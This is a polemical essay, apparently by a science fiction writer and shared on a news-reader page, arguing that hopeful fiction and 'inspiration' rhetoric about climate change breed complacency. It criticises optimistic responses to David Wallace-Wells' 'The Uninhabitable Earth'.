You want to convince me that SF can change the world? Show me the timeline where we headed off overpopulation because people read Stand on Zanzibar. Show me a world where the existence of Nineteen Eighty-Four prevented the US and Britain from routinely surveilling their citizens. Show me a place where ‘Murrica read The Handmaid’s Tale and whispered in horrified tones: “Holy shit, we really gotta dial back our religious fundamentalism.”

It’s no accomplishment to inspire people to do things they already want to. You want to lay claim to being part of Team Worldchanger, show me a time when you inspired people to do something they didn’t want to. Show me a time you changed society’s mind.

Ray Bradbury tried to imagine such a world, once— late in his career when he’d gone soft, when hard-edged masterpieces like “Skeleton” and  “The Small Assassin” were lost to history and all he had left in him were mushy stories about Laurel and Hardy, or time-travelers who used their technology to go back and make Herman Melville feel better about his writing career. This particular story was called “The Toynbee Convector”, and it was about a guy who saved the world by lying to it. He told everyone that he’d built a time machine, gone into the Future, and seen that It Was Good: we’d cleaned up the planet, saved the whales, eliminated poverty and overpopulation. And in this upbeat science fiction story, people didn’t say Great: well, since we know everything’s gonna be okay anyhow, we might as well keep sitting on our asses, snarfing pork rinds until Utopia comes calling. No, they rolled up their sleeves, and by golly they set about making that future happen. I don’t know if I’ve ever read a story more willfully blind to Human Nature.

If you’re looking for ways in which science fiction can inspire, here’s something the hope police may have forgotten to mention: if downbeat stories inspire despair and paralysis, it’s at least as likely that upbeat stories inspire complacency. Yeah, I know the planet’s warming and the icecaps are melting and we’re wiping out sixty species a day, but I’m sure we’ll muddle through somehow. We’re a resourceful species when the chips are down. Someone will come up with something. I read it in a book by Kim Stanley Robinson.

*

In fact, Kim Stanley Robinson is a good example. He’s no misty-eyed Utopian by any stretch, but he’s certainly more hopeful in his imaginings than the Atwoods and Brunners of the world. He recently pointed to the Paris Agreement as a “hopeful sign“:

It was a historical moment that will go down in any competent world history … That moment when the United Nation member states said, “We have to put a price on carbon. We have to go beyond capitalism and regulate our entire economy and our technological base in order to keep the planet alive.”

Surely I can’t be the only one who sees the oxymoron in “put a price on carbon … go beyond capitalism”. The moment you affix a monetary value to carbon you’re subsuming it into capitalism. You’re turning it into just another commodity to be bought and sold.

Don't worry! Be happy!

Don’t worry! Be happy!

Granted, this is better than pretending it doesn’t exist (I believe “externalities” is the term economists use when they want to ignore something completely). And Robinson is no fan of conventional economics: he dismissed the field as “pseudoscience” at Readercon a few years back, which was heartening even if it is so obvious you shouldn’t have to keep coming out and saying it. But the moment you put a price on carbon, it’s only a matter of time before some asshole shows up with a checkbook and says “OK— here’s your price, paid in full. Now fuck off while I continue to destroy the world in time for the next quarterly report.” Putting a price on carbon is the exact opposite of moving beyond capitalism; it’s extending capitalism into new and more dangerous realms.

Citing such developments as positive makes me a bit queasy.

I got the same kind of feeling when everyone dog-piled all over David Wallace-Wells “The Uninhabitable Earth” in New York Magazine this past summer. Wallace-Wells’ bottom line was that even the bad news you’ve heard about climate change is a soft-sell, that things are even worse than the experts are admitting, that in all likelihood large parts of the planet will be uninhabitable for humans by the end of this century.

It took about three hours for the yay-sayers to start weighing in, tearing down that gloomy-Gus perspective. They tried to pick holes in the science, although ultimately they had to admit that there weren’t many. The main complaint was that Wallace-Wells always assumes the worst-case scenario— and really, things probably won’t get that bad. Even Michel Mann, one of Climate Change’s biggest rock stars, weighed in: “There is no need to overstate the evidence, particularly when it feeds a paralyzing narrative of doom and hopelessness.” This turned out to be the most common criticism: not that the article was necessarily wrong overall, but that it was just too depressing, too defeatist. Have to give people hope, you know. Have to stop being all doom-and-gloom and start inspiring instead.

I have a few problems with this. First: Sorry, but when you’re driving for the edge of a cliff with your foot literally on the gas, I don’t think “inspiration” is what we should be going for. We should be going for sheer pants-pissing terror at the prospect of what happens when we go over that cliff. I humbly suggest that that might prove a better motivator.

Further, describing the worst-case scenario isn’t unreasonable when the observed data keep converging on something even worse. Science, by nature, is conservative; a result isn’t even considered statistically significant below a probability of at least 95%, often 99%. Global systems are full of complexity and noise, things that degrade statistical significance even in the presence of real effects— so scientific publications, almost by definition, tend to understate risk.

Which might explain why, once we were finally able to collect field data to weigh against decades of computer projections, the best news was that observed CO2 emissions were only tracking the predicted worst-case scenario. Ice-cap melting and sea-level rise were worse than the predicted worst-case— and from what I can tell this is pretty typical. (I’ve been checking in on the relevant papers in Science and Nature since before the turn of the century, and I can remember maybe two papers in all that time that said Hey, this variable actually isn’t as bad as we thought!)

So saying that Wallace-Wells takes the worst-case scenario isn’t a criticism. It’s an endorsement. If anything, the man understates our predicament. Which made it a bit troubling to see even Ramez Naam— defender of dystopian fiction— weighing in against the New York piece. Calling it “bleak” and “misleading”, he accused Wallace-Wells of “underestimat[ing] Human ingenuity” and “exaggerat[ing] impacts”. He spoke of trend lines for anticipated temperature rise bending down, not up— and of course, he lamented the hopeless tone of the article which would, he felt, make it psychologically harder to take action.

I’m not sure where Ramez got his trend data— it doesn’t seem entirely consistent with what those Copenhagen folks had to say a few years back— but even if he’s right, it’s a little like saying Yes, we may be a hundred meters away from running into that iceberg, but over the past couple of hours we’ve actually managed to change course by three whole degrees! Progress! At this rate we’ll be able to miss the iceberg entirely in just another three or four kilometers!

*

I don’t mean to pick on Ramez, any more than on Favro— having recently hung out with him, I can attest that he is one smart and awesome dude. But. Try this scenario on for size:

You’re in your living room, watching Netflix. You look out the window and see a great honking boulder plunging down the hill, mere seconds from smashing your home to kindling. Do you:

  1. Crumple into a ball of weeping despair and wait for the end;
  2. Keep watching Stranger Things because that boulder is just a Chinese hoax;
  3. Wait for someone to inspire you to action with tales of a hopeful future; or
  4. Run like hell, even though it means abandoning your giant flatscreen TV?

This underscores, I believe, a potential flaw in the worldview of the hope police. It may be that despair and hopelessness reduce us into inaction— but it may also be true that we simply aren’t scared enough.  You can thank our old friend Hyperbolic Discounting for that: the future is never all that real to us, not down in the gut where we set our priorities. Catastrophe in ten years is less real than discomfort today. So we put off the necessary steps. We slide towards apocalypse because we can’t be bothered to get off the couch.  The problem is not that we are paralyzed with despair; the problem, more likely, is that we haven’t really internalized what’s in store for us. The problem is that our species is already delusionally optimistic by nature.

Not all of us, mind you. Some folks perceive their contextual status with relative accuracy: they’re better than the rest of us at figuring out how much control they really have over local events, for example. They’re better at assessing their own performance at assigned tasks. Most of us tend to take credit for the good things that happen to us, while blaming something else for the bad. But some folks, faced with the same scenarios, apportion blame and credit without that self-serving bias.

We call these people “clinically depressed”. We regard them as a bunch of unmotivated Debbie Downers who always look on the dark side— even though their worldview is empirically more accurate than the self-serving ego-boosts the rest of us experience.

Judged on that basis, chances are that even most dystopias are too optimistic. Telling us that we need to be more optimistic is like telling an already-drunk driver to have another mickey for the road. More hope and sunshine may be the last thing we need; just maybe, what we need is to catch sight of that boulder crashing down the hill, and to believe it. Maybe that might be enough to get us moving.

*

The distribution isn’t a clean bimodal. Sure, there’s a clump of us here at the Grim Dystopia end of the scale, and another clump way over there at the Power of Positive Thinking. But there’s this other place between those poles, a place that mixes light and dark. A place whose citizens say You may not like it but it’s gonna happen anyway, so why not just settle back and enjoy the ride?

I see it when Terri Favro waves away the implications of smart homes that drain our savings into the coffers of retailers we never met in exchange for products we never asked for, with a shrug and a cheery  “How many of us can resist the lure of the new?” I see it when I read articles in Wired that rail against our ongoing loss of privacy, only to finally admit “We are not going to retreat from the cloud… We live there now.” Or that more recent piece— just a couple of months back— which begins with ominous descriptions of China’s truly pernicious Social Scoring program, segues into it’s-not-all-bad Territory (Hey, at least it’s more transparent than our own No-Fly Lists), and finishes off with the not-so-subtle implication that it’ll probably happen here too before long, so we might as well get used to it.

It’s almost as though some Invisible Hand were drawing us in by expressing our worst fears, validating them to engender trust— and then gently herding us toward passive acceptance of the inevitable. “We’ll be giving up our privacy, but gaining the surprise and delight that comes with something new always waiting for us at the door!” Can’t ask for more than that.

Not unless you want to end up on the wrong kind of list, anyway.

*

These aren’t huge leaps.  Inspiration Not Despair segues into Look on the Bright Side which circles ever closer to Accept and Acquiesce.  There are, after all, a lot of interests who don’t want us to believe in that boulder crashing down the hill— and if said boulder becomes ever-harder to deny, then at least they can try to convince us that it really isn’t so bad, that we’ll learn to like the boulder even if ends up squashing a few things we used to value.  There’s always a bright side. The planet may be warming, but it’s not warming as fast! Just another few kilometers and we’ll be past that iceberg! See, we’ve even put a price on carbon!

Of course, if you really need to blame someone, look no further than those naysayers over in the corner; they’re the ones who didn’t Dream Big enough, after all. They’re the ones who failed to Inspire the rest of us. Don’t blame us when the boulder squashes you flat; blame them, for “making us all fear technology”. Blame them, for failing to “show an array of trajectories out of the gloomy toilet bowl we’re spiraling”.

In fact, why wait until the boulder actually hits?

Blame them now, and avoid the rush.

 


[1] To borrow a brilliant term from David Roberts, whose piece in Vox ably defends Wallace-Wells’ prognosis.

[2] If you want a cinematic example of this mindset, check out  Roberto Benigni’s insipid 1997 film “Life is Beautiful“, whose take-home message is that the best way to ensure your children’s survival in a Nazi death camp is to trick them into thinking that it’s all just a game and nothing can possibly hurt them.

Read the whole story
onepointzero
40 days ago
reply
« The problem is that our species is already delusionally optimistic by nature. »
Brussels, Belgium
Share this story
Delete
Next Page of Stories